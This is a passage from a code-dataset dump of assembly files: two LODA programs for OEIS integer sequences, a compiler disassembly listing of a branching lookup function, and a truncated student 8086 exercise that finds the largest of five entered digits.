] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/079/A079777.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A079777: a(0) = 0, a(1) = 1; for n > 1, a(n) = (a(n-1) + a(n-2)) (mod n).
; Submitted by Jamie Morken(s4)
; 0,1,1,2,3,0,3,3,6,0,6,6,0,6,6,12,2,14,16,11,7,18,3,21,0,21,21,15,8,23,1,24,25,16,7,23,30,16,8,24,32,15,5,20,25,0,25,25,2,27,29,5,34,39,19,3,22,25,47,13,0,13,13,26,39,0,39,39,10,49,59,37,24,61,11,72,7,2,9,11,20,31,51,82,49,46,9,55,64,30,4,34,38,72,16,88,8,96,6,3
mov $1,3
mov $2,1
mov $4,1
lpb $0
sub $0,1
sub $1,1
mod $2,$1
add $1,2
mov $3,$4
mov $4,$2
add $2,$3
lpe
mov $0,$3
| 27.888889 | 263 | 0.553785 |
36eba7745beed8ccae794a407e3ab6b9d45158ee | 679 | asm | Assembly | oeis/066/A066098.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/066/A066098.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/066/A066098.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A066098: Sum of digits of primorial(n) (A002110).
; Submitted by Jamie Morken(w1)
; 2,6,3,3,6,6,12,48,33,48,30,48,42,51,93,87,75,111,111,132,114,141,156,150,150,156,183,213,240,201,210,222,192,210,258,249,312,267,282,348,300,336,375,312,372,390,381,363,366,411,363,366,375,399,447,516,501,501,492,534,579,519,555,561,606,573,600,600,705,606,672,660,660,633,687,708,723,687,789,699,750,831,843,879,798,831,798,843,867,849,843,894,885,798,969,993,969,1011,957,957
mov $2,$0
add $2,1
max $0,$2
seq $0,2110 ; Primorial numbers (first definition): product of first n primes. Sometimes written prime(n)#.
seq $0,7953 ; Digital sum (i.e., sum of digits) of n; also called digsum(n).
| 67.9 | 379 | 0.717231 |
a1affc8774cefbedea9f0b2e44a5f68572cbbcea | 38,767 | asm | Assembly | src/root/src/api/segmented/ops/kind.asm | 0xCM/z0 | b157d3354cfff4630aa83c52ac0faf983ee4aafd | [
"BSD-3-Clause"
] | null | null | null | src/root/src/api/segmented/ops/kind.asm | 0xCM/z0 | b157d3354cfff4630aa83c52ac0faf983ee4aafd | [
"BSD-3-Clause"
] | null | null | null | src/root/src/api/segmented/ops/kind.asm | 0xCM/z0 | b157d3354cfff4630aa83c52ac0faf983ee4aafd | [
"BSD-3-Clause"
] | null | null | null | 0000h nop dword ptr [rax+rax] ; NOP r/m32 | o32 0F 1F /0 | 5 | 0f 1f 44 00 00
0005h movzx eax,cx ; MOVZX r32, r/m16 | o32 0F B7 /r | 3 | 0f b7 c1
0008h cmp eax,40h ; CMP r/m32, imm8 | o32 83 /7 ib | 3 | 83 f8 40
000bh ja short 0029h ; JA rel8 | 77 cb | 2 | 77 1c
000dh cmp eax,10h ; CMP r/m32, imm8 | o32 83 /7 ib | 3 | 83 f8 10
0010h je short 004fh ; JE rel8 | 74 cb | 2 | 74 3d
0012h cmp eax,20h ; CMP r/m32, imm8 | o32 83 /7 ib | 3 | 83 f8 20
0015h je near ptr 009eh ; JE rel32 | 0F 84 cd | 6 | 0f 84 83 00 00 00
001bh cmp eax,40h ; CMP r/m32, imm8 | o32 83 /7 ib | 3 | 83 f8 40
001eh je near ptr 0124h ; JE rel32 | 0F 84 cd | 6 | 0f 84 00 01 00 00
0024h jmp near ptr 0421h ; JMP rel32 | E9 cd | 5 | e9 f8 03 00 00
0029h cmp eax,80h ; CMP EAX, imm32 | o32 3D id | 5 | 3d 80 00 00 00
002eh je near ptr 01e4h ; JE rel32 | 0F 84 cd | 6 | 0f 84 b0 01 00 00
0034h cmp eax,100h ; CMP EAX, imm32 | o32 3D id | 5 | 3d 00 01 00 00
0039h je near ptr 02a4h ; JE rel32 | 0F 84 cd | 6 | 0f 84 65 02 00 00
003fh cmp eax,200h ; CMP EAX, imm32 | o32 3D id | 5 | 3d 00 02 00 00
0044h je near ptr 0364h ; JE rel32 | 0F 84 cd | 6 | 0f 84 1a 03 00 00
004ah jmp near ptr 0421h ; JMP rel32 | E9 cd | 5 | e9 d2 03 00 00
004fh cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0055h ja short 0069h ; JA rel8 | 77 cb | 2 | 77 12
0057h cmp edx,10000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 01 00
005dh je short 007bh ; JE rel8 | 74 cb | 2 | 74 1c
005fh cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0065h je short 0082h ; JE rel8 | 74 cb | 2 | 74 1b
0067h jmp short 0097h ; JMP rel8 | EB cb | 2 | eb 2e
0069h cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
006fh je short 0090h ; JE rel8 | 74 cb | 2 | 74 1f
0071h cmp edx,80000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 08 00
0077h je short 0089h ; JE rel8 | 74 cb | 2 | 74 10
0079h jmp short 0097h ; JMP rel8 | EB cb | 2 | eb 1c
007bh mov eax,20010018h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 18 00 01 20
0080h jmp short 0099h ; JMP rel8 | EB cb | 2 | eb 17
0082h mov eax,80020018h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 18 00 02 80
0087h jmp short 0099h ; JMP rel8 | EB cb | 2 | eb 10
0089h mov eax,80080010h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 10 00 08 80
008eh jmp short 0099h ; JMP rel8 | EB cb | 2 | eb 09
0090h mov eax,20040010h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 10 00 04 20
0095h jmp short 0099h ; JMP rel8 | EB cb | 2 | eb 02
0097h xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
0099h jmp near ptr 0423h ; JMP rel32 | E9 cd | 5 | e9 85 03 00 00
009eh cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
00a4h ja short 00c0h ; JA rel8 | 77 cb | 2 | 77 1a
00a6h cmp edx,10000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 01 00
00ach je short 00ech ; JE rel8 | 74 cb | 2 | 74 3e
00aeh cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
00b4h je short 00f3h ; JE rel8 | 74 cb | 2 | 74 3d
00b6h cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
00bch je short 0101h ; JE rel8 | 74 cb | 2 | 74 43
00beh jmp short 011dh ; JMP rel8 | EB cb | 2 | eb 5d
00c0h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
00c6h ja short 00dah ; JA rel8 | 77 cb | 2 | 77 12
00c8h cmp edx,80000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 08 00
00ceh je short 00fah ; JE rel8 | 74 cb | 2 | 74 2a
00d0h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
00d6h je short 010fh ; JE rel8 | 74 cb | 2 | 74 37
00d8h jmp short 011dh ; JMP rel8 | EB cb | 2 | eb 43
00dah cmp edx,200000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 20 00
00e0h je short 0108h ; JE rel8 | 74 cb | 2 | 74 26
00e2h cmp edx,2000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 02
00e8h je short 0116h ; JE rel8 | 74 cb | 2 | 74 2c
00eah jmp short 011dh ; JMP rel8 | EB cb | 2 | eb 31
00ech mov eax,20010028h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 28 00 01 20
00f1h jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 2c
00f3h mov eax,80020028h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 28 00 02 80
00f8h jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 25
00fah mov eax,80080030h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 30 00 08 80
00ffh jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 1e
0101h mov eax,20040030h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 30 00 04 20
0106h jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 17
0108h mov eax,80200020h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 00 20 80
010dh jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 10
010fh mov eax,20100020h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 00 10 20
0114h jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 09
0116h mov eax,42000020h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 00 00 42
011bh jmp short 011fh ; JMP rel8 | EB cb | 2 | eb 02
011dh xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
011fh jmp near ptr 0423h ; JMP rel32 | E9 cd | 5 | e9 ff 02 00 00
0124h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
012ah ja short 0163h ; JA rel8 | 77 cb | 2 | 77 37
012ch cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0132h ja short 0149h ; JA rel8 | 77 cb | 2 | 77 15
0134h cmp edx,10000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 01 00
013ah je short 0197h ; JE rel8 | 74 cb | 2 | 74 5b
013ch cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0142h je short 019eh ; JE rel8 | 74 cb | 2 | 74 5a
0144h jmp near ptr 01ddh ; JMP rel32 | E9 cd | 5 | e9 94 00 00 00
0149h cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
014fh je short 01a5h ; JE rel8 | 74 cb | 2 | 74 54
0151h cmp edx,80000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 08 00
0157h je short 01ach ; JE rel8 | 74 cb | 2 | 74 53
0159h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
015fh je short 01b3h ; JE rel8 | 74 cb | 2 | 74 52
0161h jmp short 01ddh ; JMP rel8 | EB cb | 2 | eb 7a
0163h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
0169h ja short 017dh ; JA rel8 | 77 cb | 2 | 77 12
016bh cmp edx,200000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 20 00
0171h je short 01bah ; JE rel8 | 74 cb | 2 | 74 47
0173h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
0179h je short 01c1h ; JE rel8 | 74 cb | 2 | 74 46
017bh jmp short 01ddh ; JMP rel8 | EB cb | 2 | eb 60
017dh cmp edx,800000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 80 00
0183h je short 01c8h ; JE rel8 | 74 cb | 2 | 74 43
0185h cmp edx,2000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 02
018bh je short 01cfh ; JE rel8 | 74 cb | 2 | 74 42
018dh cmp edx,4000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 04
0193h je short 01d6h ; JE rel8 | 74 cb | 2 | 74 41
0195h jmp short 01ddh ; JMP rel8 | EB cb | 2 | eb 46
0197h mov eax,20010048h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 48 00 01 20
019ch jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 41
019eh mov eax,80020048h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 48 00 02 80
01a3h jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 3a
01a5h mov eax,20040050h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 50 00 04 20
01aah jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 33
01ach mov eax,80080050h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 50 00 08 80
01b1h jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 2c
01b3h mov eax,80200060h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 60 00 20 80
01b8h jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 25
01bah mov eax,80200060h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 60 00 20 80
01bfh jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 1e
01c1h mov eax,20400040h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 00 40 20
01c6h jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 17
01c8h mov eax,80800040h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 00 80 80
01cdh jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 10
01cfh mov eax,42000060h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 60 00 00 42
01d4h jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 09
01d6h mov eax,44000040h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 00 00 44
01dbh jmp short 01dfh ; JMP rel8 | EB cb | 2 | eb 02
01ddh xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
01dfh jmp near ptr 0423h ; JMP rel32 | E9 cd | 5 | e9 3f 02 00 00
01e4h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
01eah ja short 0223h ; JA rel8 | 77 cb | 2 | 77 37
01ech cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
01f2h ja short 0209h ; JA rel8 | 77 cb | 2 | 77 15
01f4h cmp edx,10000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 01 00
01fah je short 0257h ; JE rel8 | 74 cb | 2 | 74 5b
01fch cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0202h je short 025eh ; JE rel8 | 74 cb | 2 | 74 5a
0204h jmp near ptr 029dh ; JMP rel32 | E9 cd | 5 | e9 94 00 00 00
0209h cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
020fh je short 0265h ; JE rel8 | 74 cb | 2 | 74 54
0211h cmp edx,80000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 08 00
0217h je short 026ch ; JE rel8 | 74 cb | 2 | 74 53
0219h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
021fh je short 0273h ; JE rel8 | 74 cb | 2 | 74 52
0221h jmp short 029dh ; JMP rel8 | EB cb | 2 | eb 7a
0223h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
0229h ja short 023dh ; JA rel8 | 77 cb | 2 | 77 12
022bh cmp edx,200000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 20 00
0231h je short 027ah ; JE rel8 | 74 cb | 2 | 74 47
0233h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
0239h je short 0281h ; JE rel8 | 74 cb | 2 | 74 46
023bh jmp short 029dh ; JMP rel8 | EB cb | 2 | eb 60
023dh cmp edx,800000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 80 00
0243h je short 0288h ; JE rel8 | 74 cb | 2 | 74 43
0245h cmp edx,2000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 02
024bh je short 028fh ; JE rel8 | 74 cb | 2 | 74 42
024dh cmp edx,4000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 04
0253h je short 0296h ; JE rel8 | 74 cb | 2 | 74 41
0255h jmp short 029dh ; JMP rel8 | EB cb | 2 | eb 46
0257h mov eax,20010088h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 88 00 01 20
025ch jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 41
025eh mov eax,80020088h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 88 00 02 80
0263h jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 3a
0265h mov eax,20040090h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 90 00 04 20
026ah jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 33
026ch mov eax,80080090h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 90 00 08 80
0271h jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 2c
0273h mov eax,802000a0h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 a0 00 20 80
0278h jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 25
027ah mov eax,802000a0h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 a0 00 20 80
027fh jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 1e
0281h mov eax,204000c0h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 c0 00 40 20
0286h jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 17
0288h mov eax,808000c0h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 c0 00 80 80
028dh jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 10
028fh mov eax,420000a0h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 a0 00 00 42
0294h jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 09
0296h mov eax,440000c0h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 c0 00 00 44
029bh jmp short 029fh ; JMP rel8 | EB cb | 2 | eb 02
029dh xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
029fh jmp near ptr 0423h ; JMP rel32 | E9 cd | 5 | e9 7f 01 00 00
02a4h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
02aah ja short 02e3h ; JA rel8 | 77 cb | 2 | 77 37
02ach cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
02b2h ja short 02c9h ; JA rel8 | 77 cb | 2 | 77 15
02b4h cmp edx,10000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 01 00
02bah je short 0317h ; JE rel8 | 74 cb | 2 | 74 5b
02bch cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
02c2h je short 031eh ; JE rel8 | 74 cb | 2 | 74 5a
02c4h jmp near ptr 035dh ; JMP rel32 | E9 cd | 5 | e9 94 00 00 00
02c9h cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
02cfh je short 0325h ; JE rel8 | 74 cb | 2 | 74 54
02d1h cmp edx,80000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 08 00
02d7h je short 032ch ; JE rel8 | 74 cb | 2 | 74 53
02d9h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
02dfh je short 0333h ; JE rel8 | 74 cb | 2 | 74 52
02e1h jmp short 035dh ; JMP rel8 | EB cb | 2 | eb 7a
02e3h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
02e9h ja short 02fdh ; JA rel8 | 77 cb | 2 | 77 12
02ebh cmp edx,200000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 20 00
02f1h je short 033ah ; JE rel8 | 74 cb | 2 | 74 47
02f3h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
02f9h je short 0341h ; JE rel8 | 74 cb | 2 | 74 46
02fbh jmp short 035dh ; JMP rel8 | EB cb | 2 | eb 60
02fdh cmp edx,800000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 80 00
0303h je short 0348h ; JE rel8 | 74 cb | 2 | 74 43
0305h cmp edx,2000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 02
030bh je short 034fh ; JE rel8 | 74 cb | 2 | 74 42
030dh cmp edx,4000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 04
0313h je short 0356h ; JE rel8 | 74 cb | 2 | 74 41
0315h jmp short 035dh ; JMP rel8 | EB cb | 2 | eb 46
0317h mov eax,20010108h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 08 01 01 20
031ch jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 41
031eh mov eax,80020108h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 08 01 02 80
0323h jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 3a
0325h mov eax,20040110h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 10 01 04 20
032ah jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 33
032ch mov eax,80080110h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 10 01 08 80
0331h jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 2c
0333h mov eax,80200120h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 01 20 80
0338h jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 25
033ah mov eax,80200120h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 01 20 80
033fh jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 1e
0341h mov eax,20400140h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 01 40 20
0346h jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 17
0348h mov eax,80800140h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 01 80 80
034dh jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 10
034fh mov eax,42000120h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 01 00 42
0354h jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 09
0356h mov eax,44000140h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 01 00 44
035bh jmp short 035fh ; JMP rel8 | EB cb | 2 | eb 02
035dh xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
035fh jmp near ptr 0423h ; JMP rel32 | E9 cd | 5 | e9 bf 00 00 00
0364h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
036ah ja short 03a3h ; JA rel8 | 77 cb | 2 | 77 37
036ch cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0372h ja short 0389h ; JA rel8 | 77 cb | 2 | 77 15
0374h cmp edx,10000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 01 00
037ah je short 03d7h ; JE rel8 | 74 cb | 2 | 74 5b
037ch cmp edx,20000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 02 00
0382h je short 03deh ; JE rel8 | 74 cb | 2 | 74 5a
0384h jmp near ptr 041dh ; JMP rel32 | E9 cd | 5 | e9 94 00 00 00
0389h cmp edx,40000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 04 00
038fh je short 03e5h ; JE rel8 | 74 cb | 2 | 74 54
0391h cmp edx,80000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 08 00
0397h je short 03ech ; JE rel8 | 74 cb | 2 | 74 53
0399h cmp edx,100000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 10 00
039fh je short 03f3h ; JE rel8 | 74 cb | 2 | 74 52
03a1h jmp short 041dh ; JMP rel8 | EB cb | 2 | eb 7a
03a3h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
03a9h ja short 03bdh ; JA rel8 | 77 cb | 2 | 77 12
03abh cmp edx,200000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 20 00
03b1h je short 03fah ; JE rel8 | 74 cb | 2 | 74 47
03b3h cmp edx,400000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 40 00
03b9h je short 0401h ; JE rel8 | 74 cb | 2 | 74 46
03bbh jmp short 041dh ; JMP rel8 | EB cb | 2 | eb 60
03bdh cmp edx,800000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 80 00
03c3h je short 0408h ; JE rel8 | 74 cb | 2 | 74 43
03c5h cmp edx,2000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 02
03cbh je short 040fh ; JE rel8 | 74 cb | 2 | 74 42
03cdh cmp edx,4000000h ; CMP r/m32, imm32 | o32 81 /7 id | 6 | 81 fa 00 00 00 04
03d3h je short 0416h ; JE rel8 | 74 cb | 2 | 74 41
03d5h jmp short 041dh ; JMP rel8 | EB cb | 2 | eb 46
03d7h mov eax,20010208h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 08 02 01 20
03dch jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 41
03deh mov eax,80020208h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 08 02 02 80
03e3h jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 3a
03e5h mov eax,20040210h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 10 02 04 20
03eah jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 33
03ech mov eax,80080210h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 10 02 08 80
03f1h jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 2c
03f3h mov eax,80200220h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 02 20 80
03f8h jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 25
03fah mov eax,80200220h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 02 20 80
03ffh jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 1e
0401h mov eax,20400240h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 02 40 20
0406h jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 17
0408h mov eax,80800240h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 02 80 80
040dh jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 10
040fh mov eax,42000220h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 20 02 00 42
0414h jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 09
0416h mov eax,44000240h ; MOV r32, imm32 | o32 B8+rd id | 5 | b8 40 02 00 44
041bh jmp short 041fh ; JMP rel8 | EB cb | 2 | eb 02
041dh xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
041fh jmp short 0423h ; JMP rel8 | EB cb | 2 | eb 02
0421h xor eax,eax ; XOR r32, r/m32 | o32 33 /r | 2 | 33 c0
0423h ret ; RET | C3 | 1 | c3 | 135.076655 | 141 | 0.304589 |
530d077d91f9e2564cf12061d2414b4a030d82dc | 1,418 | asm | Assembly | y2s2/csa/practicals/revision/ex-5.asm | ouldevloper/university | 4bb4a7e86912b46aa625900d2985b4d1e436cf4e | [
"MIT"
] | 8 | 2019-06-22T14:29:51.000Z | 2021-09-22T16:58:12.000Z | y2s2/csa/practicals/revision/ex-5.asm | ouldevloper/university | 4bb4a7e86912b46aa625900d2985b4d1e436cf4e | [
"MIT"
] | 1 | 2020-06-30T06:38:00.000Z | 2020-07-08T06:37:57.000Z | y2s2/csa/practicals/revision/ex-5.asm | ouldevloper/university | 4bb4a7e86912b46aa625900d2985b4d1e436cf4e | [
"MIT"
] | 9 | 2020-04-04T12:59:50.000Z | 2022-03-27T22:44:58.000Z | ; ex-5.asm (loop, array, jump)
; find largest value from list
; prompt for 5 digits
; accept 5 digits (assume will only enter 5 digits)
; find largest value
; display largest value on screen
.MODEL SMALL
.STACK 100
.DATA
STR LABEL BYTE
maxn DB 6
actn DB ?
actstr DB 6 dup('$')
max DB ?
digits DB 5
inTxt DB 'Please enter 5 digits >> $'
maxTxt DB 'The largest value is >> $'
nl DB 13,10,'$'
.CODE
MAIN PROC
MOV AX, @DATA
MOV DS, AX
; ask for 5 digits
; text
MOV AH, 09h
LEA DX, inTxt
INT 21h
; input
MOV AH, 0Ah
LEA DX, str
INT 21h
; set first digit as max
MOV BL, actstr[0]
MOV max, BL
MOV CH, 0
MOV CL, actn
MOV SI, 0
; from 2-5 digit in ACTSTR
COMPARE:
; compare n with max
MOV BL, actstr[SI]
CMP BL, max
; if n <= max, cont
JG REPLACE
JMP CONTINUE
; else, max = n
REPLACE:
MOV BL, actstr[SI]
MOV max, BL
; continue
CONTINUE:
INC SI
LOOP COMPARE
; display max
CALL NEWLINE
MOV AH, 09H
